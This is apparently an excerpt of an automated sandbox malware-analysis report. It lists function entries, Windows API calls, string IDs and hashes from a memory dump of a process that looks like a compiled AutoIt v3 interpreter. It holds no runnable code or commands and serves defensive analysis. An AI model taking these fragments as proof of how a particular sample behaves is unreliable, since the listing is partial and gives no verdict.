                                                                                                                                                                                                                    • Instruction ID: 1179a81d8d5caa12079cc6de55c01502aef5dc188cc9ee139b0c549a39202661
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CD19071E5D2C285F7208B20A8101753BA1BF29788F8C0B3AD58DE7661DFBEB500C751

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1787492119-0
                                                                                                                                                                                                                    • Opcode ID: 179ff2b16448044f8842acbd3d24d1ce2f36b6c32204185f73a086de7a39bf3b
                                                                                                                                                                                                                    • Instruction ID: 88062482a92eb9b8e186af007455a0f8273de610a1532319272cd98be6ff29f8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 179ff2b16448044f8842acbd3d24d1ce2f36b6c32204185f73a086de7a39bf3b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3E19122A08B8185EB10DF26D55017E77B0FBC4B84F484A35DE5DA77A9CF7AE845C740
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2695905019-0
                                                                                                                                                                                                                    • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                                                                                                                                                    • Instruction ID: 0dc46eaceab856eefded332282aa574d268bffc068a93878f3c7f3d535f9580c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F08211E18646C1EA645B24FC083386360AF85BB5F5C8B30D47F962E4DFADE898C200

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                                                                                                                                                                    • API String ID: 2667193904-1575078665
                                                                                                                                                                                                                    • Opcode ID: ccdde91ff49b8a1df99aa6a2d821529d6f27c14787be887cfcf32b135e51df6f
                                                                                                                                                                                                                    • Instruction ID: ee42667b31945fed7f1d7b24d75f46d12cef552f74a6a3a109ffa8a85977ac2e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ccdde91ff49b8a1df99aa6a2d821529d6f27c14787be887cfcf32b135e51df6f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5916D72A28A8395EB20DF25E8401B97374FF84784F884732E54DA7AA5DF7EE245C740

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                    • String ID: TaskbarCreated
                                                                                                                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                                                                                                                    • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                                                                                                                                                    • Instruction ID: 70cbbccdda21ade6de30cc039dd214f25a6dd50aaa2050f54c1012b11c696da5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F5166B1A1C68381FA60AF24E84427D63A0AF45B84FCC0B31D54EE26B6CE6FF945C340

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                    • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                    • API String ID: 2914291525-2659433951
                                                                                                                                                                                                                    • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                                                                                                                                                    • Instruction ID: 359d89cdd95f6520cb0759944d07280f348428f92a3d2c9c1f5224ecdccb7638
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71316C32A08B419AF700CF60E8443A837B4FB58748F580B38CA4DA7B64DF7E9199CB40

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                                                                                                                                                                    • String ID: close all
                                                                                                                                                                                                                    • API String ID: 1992507300-3243417748
                                                                                                                                                                                                                    • Opcode ID: 5806ba81a6394c6c6bc24e0a403329b104b23ccda43142fd0edcef9136b173bc
                                                                                                                                                                                                                    • Instruction ID: 0fcbd5ba710e8ee717e85e27c61645cdd744e7160fd7e7079abc7d7e4ec7455a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5806ba81a6394c6c6bc24e0a403329b104b23ccda43142fd0edcef9136b173bc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4DE14C62B49A4281FE58EB16C56027C2370BF89B84F4C4675DB1EB7291DF7EE862C700

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                    • String ID: AutoIt v3
                                                                                                                                                                                                                    • API String ID: 423443420-1704141276
                                                                                                                                                                                                                    • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                                                                                                                                                    • Instruction ID: bd594cdeb15b526e3ebd9242abab92cb9d759d1d1d761df9b0978b61a32d8f21
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5311936A08B028AEB40CB51F8447A93774FB58798F580B39C98DA7B64DFBED058C740

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1617910340-0
                                                                                                                                                                                                                    • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                                                                                                                                                    • Instruction ID: 447db6cab9a46ebecd7da4e66ffaba79089c930e68cecbbbf68731973891b042
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86C1DF72B18A428AEB508F64D4413AC3771EB49BA8F085335DE2EAB7D5DF3AE455C310

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3249950245-0
                                                                                                                                                                                                                    • Opcode ID: a7bd3d3d385e5b1d1f54d85392a1c68edf1031921459ddba508b5b03e4368d75
                                                                                                                                                                                                                    • Instruction ID: 8fae4cade2506322f9304e5aa599a643e4485b0353af9defe8b0c877135ad226
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7bd3d3d385e5b1d1f54d85392a1c68edf1031921459ddba508b5b03e4368d75
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9229C72A0C68286FB748B25E4907B937B0FB45B58F184636CA5FA3695DF3EE485C700

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    control_flow_graph 849 7ff656cb3cbc-7ff656cb3d88 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Create$Show
                                                                                                                                                                                                                    • String ID: AutoIt v3$d$edit
                                                                                                                                                                                                                    • API String ID: 2813641753-2600919596
                                                                                                                                                                                                                    • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                                                                                                                                                    • Instruction ID: 6a6bf6a683b54208f01fe1a52480543b5ef7eceb960261d7c6a603159624a361
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09212C72A2CB4186EB50CF10F44872977A0F789799F144B38D68D96654CFBED185CB00

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF656CB7FA5), ref: 00007FF656CD2D8E
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF656CB7FA5), ref: 00007FF656CD2D9C
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF656CB7FA5), ref: 00007FF656CD2DAC
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF656CB7FA5), ref: 00007FF656CD2DBC
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF656CB7FA5), ref: 00007FF656CD2DCA
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF656CB7FA5), ref: 00007FF656CD2DD8
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CCEEC8: RegisterWindowMessageW.USER32 ref: 00007FF656CCEF76
                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF656CB106D), ref: 00007FF656CB8209
                                                                                                                                                                                                                    • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF656CB106D), ref: 00007FF656CB828F
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF656CB106D), ref: 00007FF656CFD36A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                    • String ID: AutoIt
                                                                                                                                                                                                                    • API String ID: 1986988660-2515660138
                                                                                                                                                                                                                    • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                                                                                                                                                    • Instruction ID: 7ea80f62d6c2dd9a4539b7069cd453d59b92fc34165f77df1eedb3cea70f0d13
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4C1DE71D1DB4289E640DF24E8810B877A8BF99348F5C4B3AD55DE26B1EF7EA184C780

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                                                                                                                                                                    • String ID: Line:
                                                                                                                                                                                                                    • API String ID: 3135491444-1585850449
                                                                                                                                                                                                                    • Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                                                                                                                                                    • Instruction ID: 59e7fa959170871f02ae29b5bae3e7c4f16d7a5b35ba917d9395ae71afd25447
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A4167B1A0C68296EB20DB10E4402F96371FB45388FCC5536DA8DA76A9DF7ED544C750
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetOpenFileNameW.COMDLG32 ref: 00007FF656CFBAA2
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB56D4: GetFullPathNameW.KERNEL32(?,00007FF656CB56C1,?,00007FF656CB7A0C,?,?,?,00007FF656CB109E), ref: 00007FF656CB56FF
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB3EB4: GetLongPathNameW.KERNELBASE ref: 00007FF656CB3ED8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                    • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF656CB6F52,?,?,?,?,?,?,00007FF656CB782C), ref: 00007FF656CB6FA5
                                                                                                                                                                                                                    • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF656CB6F52,?,?,?,?,?,?,00007FF656CB782C), ref: 00007FF656CB6FD3
                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF656CB6F52,?,?,?,?,?,?,00007FF656CB782C), ref: 00007FF656CB6FFA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                    • String ID: CALL
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1144537725-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsThemeActive.UXTHEME ref: 00007FF656CB3756
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD9334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF656CD9348
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB36E8: SystemParametersInfoW.USER32 ref: 00007FF656CB3705
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB36E8: SystemParametersInfoW.USER32 ref: 00007FF656CB3725
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB37B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB37F2
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB37B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB3807
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB37B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB388D
